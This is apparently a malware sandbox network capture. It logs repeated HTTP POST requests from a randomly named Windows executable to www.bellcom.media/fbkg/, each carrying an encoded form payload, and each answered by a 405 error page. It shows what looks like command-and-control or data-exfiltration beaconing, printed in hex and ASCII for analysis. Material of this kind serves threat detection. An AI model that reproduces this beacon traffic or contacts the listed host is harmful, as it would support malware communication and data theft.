                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                6191.195.240.12380192.168.11.2050188C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:31:40.575499058 CET1243OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.bellcom.media
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 524
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.bellcom.media
                                                                                                                                                                                                Referer: http://www.bellcom.media/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 4d 38 61 77 39 66 58 6c 46 32 32 55 31 33 73 38 54 50 55 6b 56 61 43 6c 41 78 45 6e 44 78 4f 73 2f 37 4d 50 54 50 75 6c 72 31 6f 5a 36 2f 6c 71 4b 6c 67 42 70 35 53 38 63 71 59 32 42 4e 43 6f 6f 71 50 32 45 47 48 2b 6f 71 59 65 45 42 2b 79 35 4f 39 36 33 32 4e 50 41 39 72 75 70 6a 77 64 48 75 58 72 31 32 62 5a 79 31 35 4c 6f 30 4b 70 6a 44 63 64 67 47 57 30 54 5a 69 55 7a 73 6c 70 67 49 6d 74 66 73 6f 42 66 75 55 48 4b 64 4c 56 73 52 48 78 43 77 35 4c 48 44 37 38 6c 4d 36 64 52 49 6e 4b 4b 64 4a 4c 31 74 51 62 4e 6b 4c 35 38 69 44 53 45 6c 34 7a 4e 33 38 66 76 64 67 61 38 4d 66 48 37 4c 56 5a 56 55 45 76 32 74 68 44 56 4b 68 6e 46 48 70 41 45 63 6a 66 57 54 45 58 73 4b 43 4a 34 67 74 44 4e 5a 58 34 34 6b 64 34 62 43 77 64 4d 65 44 59 51 62 78 53 57 37 49 72 35 4b 70 46 4a 59 71 51 4f 38 62 76 4f 36 50 39 44 42 48 6b 41 69 6a 2b 71 4c 57 5a 72 48 46 61 4e 30 6f 57 6f 4c 6c 47 64 5a 2b 6a 50 43 45 5a 45 70 39 7a 73 79 35 66 51 4d 4e 5a 53 34 61 39 6f 79 34 6b 2b 2b 47 72 59 33 5a 51 32 65 46 79 54 4e 50 71 48 4a 65 53 59 4d 46 79 4c 68 7a 5a 33 6d 76 69 56 2f 51 51 31 74 44 71 45 41 72 71 41 30 43 66 54 79 4c 7a 47 36 4d 4f 75 65 53 61 57 74 59 58 48 73 62 30 4a 6c 34 4a 70 43 69 36 67 46 54 73 68 35 57 4f 38 42 4e 63 47 32 31 4f 76 6f 66 30 49 4e 51 34 50 31 35 57 45 6b 51 2b 6e 36 6e 46 50 62 50 77 31 78 78 49 61 47 36 66 32 4a 70 4a 31 58 35 4e 4d 53 63 32 35 53 30 45 6d 5a 4f 56 55 72 61 52 2b 44 70 49 74 73 6f 58 6d 58 39 55 54 56 4c 59 66 57 4b 59 6f 6d 59 6e 31 53 43 43 66 31 33 51 78 6a 4b 65 64 6e 58 36 77 69 42 6f 4d 50 34 3d
                                                                                                                                                                                                Data Ascii: T6I=M8aw9fXlF22U13s8TPUkVaClAxEnDxOs/7MPTPulr1oZ6/lqKlgBp5S8cqY2BNCooqP2EGH+oqYeEB+y5O9632NPA9rupjwdHuXr12bZy15Lo0KpjDcdgGW0TZiUzslpgImtfsoBfuUHKdLVsRHxCw5LHD78lM6dRInKKdJL1tQbNkL58iDSEl4zN38fvdga8MfH7LVZVUEv2thDVKhnFHpAEcjfWTEXsKCJ4gtDNZX44kd4bCwdMeDYQbxSW7Ir5KpFJYqQO8bvO6P9DBHkAij+qLWZrHFaN0oWoLlGdZ+jPCEZEp9zsy5fQMNZS4a9oy4k++GrY3ZQ2eFyTNPqHJeSYMFyLhzZ3mviV/QQ1tDqEArqA0CfTyLzG6MOueSaWtYXHsb0Jl4JpCi6gFTsh5WO8BNcG21Ovof0INQ4P15WEkQ+n6nFPbPw1xxIaG6f2JpJ1X5NMSc25S0EmZOVUraR+DpItsoXmX9UTVLYfWKYomYn1SCCf13QxjKednX6wiBoMP4=
                                                                                                                                                                                                Nov 17, 2023 19:31:40.766360044 CET1244INHTTP/1.1 405 Not Allowed
                                                                                                                                                                                                date: Fri, 17 Nov 2023 18:31:40 GMT
                                                                                                                                                                                                content-type: text/html
                                                                                                                                                                                                content-length: 556
                                                                                                                                                                                                server: NginX
                                                                                                                                                                                                connection: close
                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                61192.168.11.205018891.195.240.12380C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:31:40.575499058 CET1243OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.bellcom.media
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 524
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.bellcom.media
                                                                                                                                                                                                Referer: http://www.bellcom.media/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 4d 38 61 77 39 66 58 6c 46 32 32 55 31 33 73 38 54 50 55 6b 56 61 43 6c 41 78 45 6e 44 78 4f 73 2f 37 4d 50 54 50 75 6c 72 31 6f 5a 36 2f 6c 71 4b 6c 67 42 70 35 53 38 63 71 59 32 42 4e 43 6f 6f 71 50 32 45 47 48 2b 6f 71 59 65 45 42 2b 79 35 4f 39 36 33 32 4e 50 41 39 72 75 70 6a 77 64 48 75 58 72 31 32 62 5a 79 31 35 4c 6f 30 4b 70 6a 44 63 64 67 47 57 30 54 5a 69 55 7a 73 6c 70 67 49 6d 74 66 73 6f 42 66 75 55 48 4b 64 4c 56 73 52 48 78 43 77 35 4c 48 44 37 38 6c 4d 36 64 52 49 6e 4b 4b 64 4a 4c 31 74 51 62 4e 6b 4c 35 38 69 44 53 45 6c 34 7a 4e 33 38 66 76 64 67 61 38 4d 66 48 37 4c 56 5a 56 55 45 76 32 74 68 44 56 4b 68 6e 46 48 70 41 45 63 6a 66 57 54 45 58 73 4b 43 4a 34 67 74 44 4e 5a 58 34 34 6b 64 34 62 43 77 64 4d 65 44 59 51 62 78 53 57 37 49 72 35 4b 70 46 4a 59 71 51 4f 38 62 76 4f 36 50 39 44 42 48 6b 41 69 6a 2b 71 4c 57 5a 72 48 46 61 4e 30 6f 57 6f 4c 6c 47 64 5a 2b 6a 50 43 45 5a 45 70 39 7a 73 79 35 66 51 4d 4e 5a 53 34 61 39 6f 79 34 6b 2b 2b 47 72 59 33 5a 51 32 65 46 79 54 4e 50 71 48 4a 65 53 59 4d 46 79 4c 68 7a 5a 33 6d 76 69 56 2f 51 51 31 74 44 71 45 41 72 71 41 30 43 66 54 79 4c 7a 47 36 4d 4f 75 65 53 61 57 74 59 58 48 73 62 30 4a 6c 34 4a 70 43 69 36 67 46 54 73 68 35 57 4f 38 42 4e 63 47 32 31 4f 76 6f 66 30 49 4e 51 34 50 31 35 57 45 6b 51 2b 6e 36 6e 46 50 62 50 77 31 78 78 49 61 47 36 66 32 4a 70 4a 31 58 35 4e 4d 53 63 32 35 53 30 45 6d 5a 4f 56 55 72 61 52 2b 44 70 49 74 73 6f 58 6d 58 39 55 54 56 4c 59 66 57 4b 59 6f 6d 59 6e 31 53 43 43 66 31 33 51 78 6a 4b 65 64 6e 58 36 77 69 42 6f 4d 50 34 3d
                                                                                                                                                                                                Data Ascii: T6I=M8aw9fXlF22U13s8TPUkVaClAxEnDxOs/7MPTPulr1oZ6/lqKlgBp5S8cqY2BNCooqP2EGH+oqYeEB+y5O9632NPA9rupjwdHuXr12bZy15Lo0KpjDcdgGW0TZiUzslpgImtfsoBfuUHKdLVsRHxCw5LHD78lM6dRInKKdJL1tQbNkL58iDSEl4zN38fvdga8MfH7LVZVUEv2thDVKhnFHpAEcjfWTEXsKCJ4gtDNZX44kd4bCwdMeDYQbxSW7Ir5KpFJYqQO8bvO6P9DBHkAij+qLWZrHFaN0oWoLlGdZ+jPCEZEp9zsy5fQMNZS4a9oy4k++GrY3ZQ2eFyTNPqHJeSYMFyLhzZ3mviV/QQ1tDqEArqA0CfTyLzG6MOueSaWtYXHsb0Jl4JpCi6gFTsh5WO8BNcG21Ovof0INQ4P15WEkQ+n6nFPbPw1xxIaG6f2JpJ1X5NMSc25S0EmZOVUraR+DpItsoXmX9UTVLYfWKYomYn1SCCf13QxjKednX6wiBoMP4=
                                                                                                                                                                                                Nov 17, 2023 19:31:40.766360044 CET1244INHTTP/1.1 405 Not Allowed
                                                                                                                                                                                                date: Fri, 17 Nov 2023 18:31:40 GMT
                                                                                                                                                                                                content-type: text/html
                                                                                                                                                                                                content-length: 556
                                                                                                                                                                                                server: NginX
                                                                                                                                                                                                connection: close
                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                62192.168.11.205018991.195.240.12380C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:31:43.295444965 CET1257OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.bellcom.media
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 52912
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.bellcom.media
                                                                                                                                                                                                Referer: http://www.bellcom.media/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 4d 38 61 77 39 66 58 6c 46 32 32 55 31 33 73 38 54 50 55 6b 56 61 43 6c 41 78 45 6e 44 78 4f 73 2f 37 4d 50 54 50 75 6c 72 31 67 5a 35 4d 64 71 59 57 34 42 6f 35 53 38 57 4b 59 37 42 4e 43 78 6f 71 32 78 45 47 37 41 6f 76 55 65 46 53 32 79 35 37 4a 36 38 6d 4e 4b 4d 64 72 73 74 6a 78 42 48 75 53 77 31 32 6d 73 79 46 4e 4c 72 32 69 70 30 41 45 61 75 32 57 32 54 5a 69 59 6c 73 6c 62 67 49 79 39 66 73 30 42 66 6f 4d 48 49 70 6a 56 38 53 76 78 46 67 35 4b 4d 6a 37 6e 38 63 36 34 52 4d 33 65 4b 64 4a 62 31 73 6b 62 4e 6e 7a 35 39 6c 58 54 46 46 34 7a 52 48 38 63 6b 39 73 57 38 4d 54 55 37 4b 68 5a 56 57 30 76 32 4e 68 44 65 4c 68 6b 53 58 70 43 56 4d 6a 4d 64 7a 49 66 73 4b 57 7a 34 6c 31 44 4e 4a 44 34 35 58 31 34 64 6a 77 64 42 65 44 61 65 37 78 37 63 62 4a 30 35 4b 34 75 4a 5a 4b 41 4f 38 50 76 42 36 76 39 47 67 48 6a 55 79 6a 77 30 37 57 32 6d 6e 41 62 4e 30 35 4a 6f 4c 6b 64 64 64 6d 6a 4d 79 55 5a 57 62 56 38 68 43 35 59 46 63 4e 4d 46 6f 57 7a 6f 79 6b 73 2b 2b 76 77 59 78 56 51 77 4f 46 79 59 4d 50 6c 63 70 65 56 48 38 45 2f 50 68 79 5a 33 6d 69 65 56 39 39 74 32 63 37 71 46 77 37 71 4b 45 43 41 44 69 4b 36 63 4b 4d 41 34 75 53 61 57 74 45 62 48 73 48 30 4a 51 4d 4a 76 31 6d 36 72 79 6e 73 6a 35 57 45 38 42 4e 4e 47 32 35 74 76 6f 47 6a 49 4e 67 65 50 33 31 57 45 32 34 2b 67 37 6e 43 64 62 50 31 2f 52 78 66 55 6d 6d 4d 32 49 46 42 31 58 4a 64 4e 67 49 32 34 53 45 45 74 35 4f 57 45 4c 61 57 35 44 6f 4c 70 73 31 4d 6d 58 68 71 54 55 76 78 66 52 4f 59 70 54 6f 2f 70 54 32 30 47 47 6e 77 39 55 69 72 45 33 48 52 6a 69 64 43 57 36 49 4f 66 68 35 47 34 30 69 74 75 42 38 2f 35 41 47 38 52 39 6e 43 4e 41 55 73 4d 4e 75 42 49 6c 73 76 55 30 58 61 6d 41 54 68 31 38 43 77 64 59 63 71 30 52 71 6a 6b 45 30 62 5a 65 4a 61 6a 49 74 50 47 58 4b 56 6e 58 39 69 52 45 70 64 36 2f 38 54 61 34 69 4e 67 37 67 74 6c 4d 6a 52 64 66 44 4f 4d 46 78 44 35 39 44 33 53 56 51 53 6a 70 34 53 7a 74 49 6c 39 54 68 33 79 52 58 76 62 79 55 42 2b 6c 73 56 69 42 71 4f 62 73 61 4f 67 31 55 34 53 47 48 39 39 46 79 49 41 33 44 2f 4a 66 41 37 39 57 74 49 6f 6c 35 41 54 36 38 66 69 2f 77 72 50 4c 76 74 75 53 79 47 73 75 78 50 61 68 50 6c 6c 4c 31 38 68 36 7a 6d 79 61 34 74 58 71 61 7a 49 6f 76 66 4f 38 6b 65 59 41 63 6c 77 46 5a 62 4f 36 56 57 50 54 36 6e 50 49 4b 53 50 57 6b 6e 74 6f 71 44 71 65 49 54 49 6b 63 6b 4a 73 2b 55 5a 6c 30 70 57 34 76 51 68 66 6a 36 54 46 6d 6a 79 31 30 4f 38 45 72 59 6a 7a 76 73 4b 44 36 31 5a 4d 57 54 2b 71 32 34 49 71 4f 58 4c 57 6f 4f 37 4c 4c 38 52 52 75 75 30 65 38 4e 38 49 51 51 48 51 7a 67 39 4d 57 65 79 75 2f 53 50 39 31 7a 42 48 52 72 45 74 54 38 77 52 55 74 78 34 37 6d 43 67 4f 64 6e 56 6c 57 39 77 62 70 6d 77 4d 65 5a 61 63 4e 49 41 51 70 48 6d 68 4d 51 4c 48 57 5a 66 42 55 52 37 39 69 38 61 31 76 4c 5a 66 67 49 35 4b 4b 51 61 42 32 44 72 52 6a 70 54 6a 6a 72 36 68 66 67 6e 61 2f 31 79 75 5a 61 32 6b 6b 71 74 6e 6c 52 70 39 49 39 2f 77 39 46 77 44 52 39 59 76 68 34 54 33 63 7a 6a 36 69 48 6c 39 64 63 43 31 37 6e 34 5a 43 6a 6e 62 6d 79 4d 65 2f 56 51 44 56 74 43 41 5a 6e 2b 6d 43 41 6f 2b 7a 66 2f 72 56 6b 30 5a 78 51 4b 57 41 46 4f 37 33 6f 48 59 46 35 6e 39 35 58 66 6b 2f 72 50 64 2f 52 39 42 44 36 38 6a 37 79 4b 66 76 4d 75 32 74 4f 6c 6a 4e 6e 45 78 4d 2f 42 32 6d 6e 70 30 34 45 4d 4e 61 37 54 70 2b 46 37 42 72 72 32 4d 2b 53 31 73 77 56 64 66 31 4f 42 51 59 65 35 71 4d 42 34 57 72 62 2f 46 72 56 46 38 5a 42 35 78 2b 4c 50 57 70 41 54 45 38 32 33 50 68 41 67 47 50 31 41 59 56 63 51 35 4a 34 33 47 72 41 4f 38 37 47 58 35 55 52 78 65 7a 38 51 48 37 4a 35 70 65 48 54 4c 4a 32 64 59 53 6c 6e 31 78 71 49 45 6d 6e 51 73 2f 76 62 31 79 49 79 33 49 38 58 6b 32 71 49 54 69 4d 32 78 43 63 38 50 65 69 32 53 49 7a 6f 47 59 54 59 55 5a 47 33 43 78 36 62 4c 7a 45 69 49 4f 2b 78 61 56 6d 6d 6a 35 64 37 4a 6d 69 4e 41 54 55 71 42 72 54 77 30 43 53 34 57 6a 54 6a 59 32 4b 6e 43 52 2f 59 50 32 6f 4b 49 56 6e 6b 46 5a 4d 78 6f 7a 59 75 55 63 56 47 41 67 57 48 62 4c 37 74 78 43 4b 4a 55 57 46 45 66 35 42 43 46 43 69 4d 69 35 42 73 72 71 4b 53 4e 78 6d 32 73 48 54 42 39 41 37 74 79 6b 2b 62 6c 48 65 2b 4c 68 79 74 6f
                                                                                                                                                                                                Data Ascii: T6I=M8aw9fXlF22U13s8TPUkVaClAxEnDxOs/7MPTPulr1gZ5MdqYW4Bo5S8WKY7BNCxoq2xEG7AovUeFS2y57J68mNKMdrstjxBHuSw12msyFNLr2ip0AEau2W2TZiYlslbgIy9fs0BfoMHIpjV8SvxFg5KMj7n8c64RM3eKdJb1skbNnz59lXTFF4zRH8ck9sW8MTU7KhZVW0v2NhDeLhkSXpCVMjMdzIfsKWz4l1DNJD45X14djwdBeDae7x7cbJ05K4uJZKAO8PvB6v9GgHjUyjw07W2mnAbN05JoLkdddmjMyUZWbV8hC5YFcNMFoWzoyks++vwYxVQwOFyYMPlcpeVH8E/PhyZ3mieV99t2c7qFw7qKECADiK6cKMA4uSaWtEbHsH0JQMJv1m6rynsj5WE8BNNG25tvoGjINgeP31WE24+g7nCdbP1/RxfUmmM2IFB1XJdNgI24SEEt5OWELaW5DoLps1MmXhqTUvxfROYpTo/pT20GGnw9UirE3HRjidCW6IOfh5G40ituB8/5AG8R9nCNAUsMNuBIlsvU0XamATh18CwdYcq0RqjkE0bZeJajItPGXKVnX9iREpd6/8Ta4iNg7gtlMjRdfDOMFxD59D3SVQSjp4SztIl9Th3yRXvbyUB+lsViBqObsaOg1U4SGH99FyIA3D/JfA79WtIol5AT68fi/wrPLvtuSyGsuxPahPllL18h6zmya4tXqazIovfO8keYAclwFZbO6VWPT6nPIKSPWkntoqDqeITIkckJs+UZl0pW4vQhfj6TFmjy10O8ErYjzvsKD61ZMWT+q24IqOXLWoO7LL8RRuu0e8N8IQQHQzg9MWeyu/SP91zBHRrEtT8wRUtx47mCgOdnVlW9wbpmwMeZacNIAQpHmhMQLHWZfBUR79i8a1vLZfgI5KKQaB2DrRjpTjjr6hfgna/1yuZa2kkqtnlRp9I9/w9FwDR9Yvh4T3czj6iHl9dcC17n4ZCjnbmyMe/VQDVtCAZn+mCAo+zf/rVk0ZxQKWAFO73oHYF5n95Xfk/rPd/R9BD68j7yKfvMu2tOljNnExM/B2mnp04EMNa7Tp+F7Brr2M+S1swVdf1OBQYe5qMB4Wrb/FrVF8ZB5x+LPWpATE823PhAgGP1AYVcQ5J43GrAO87GX5URxez8QH7J5peHTLJ2dYSln1xqIEmnQs/vb1yIy3I8Xk2qITiM2xCc8Pei2SIzoGYTYUZG3Cx6bLzEiIO+xaVmmj5d7JmiNATUqBrTw0CS4WjTjY2KnCR/YP2oKIVnkFZMxozYuUcVGAgWHbL7txCKJUWFEf5BCFCiMi5BsrqKSNxm2sHTB9A7tyk+blHe+LhytoK8joDjvx9kmejFklBr8MjGcC3rerzooaZBOBbZxcmfgWyBXZsikZ9ixRHjM0+kbJSBb5v4enr2Dle1U+DyC0cLnTf0w0UbK5Ly6tLaqNn8FC23NZxIRmC4VC9q6hYu4fHkFVN92sPgrSCPSCBwFvYTtMWW97/mR12g7mO3qDUUCoVdULmCekDu8O6msrLLyioY0pSz60jdxVWP3+mkGEM6yG7CWFRDyl9MMWjUEg2sMF8U3Qc2djqDa04e+zMTPp4Cx+9omJuo8MGUmXugJZvbNGPdDt52DWldF4SLOmkprfO2xz/A6yVTVXuMprZRc1ko6luKPVaFmoNuOM3m7y043yMkcMDwkPMzxHJU7vEzo60fNyTOpPzJcpz4NawojYuK2Gdeq1/rK3T8e/QlUT3NN0uOLwGVqbsWmJlLpl3mXeT+R1ug+gOzx/FgpyWgdu+ptbxgbirlkONCTt9XGWuG+xy2CqBDo5RSIuvucn8vJlxNTii28LiSk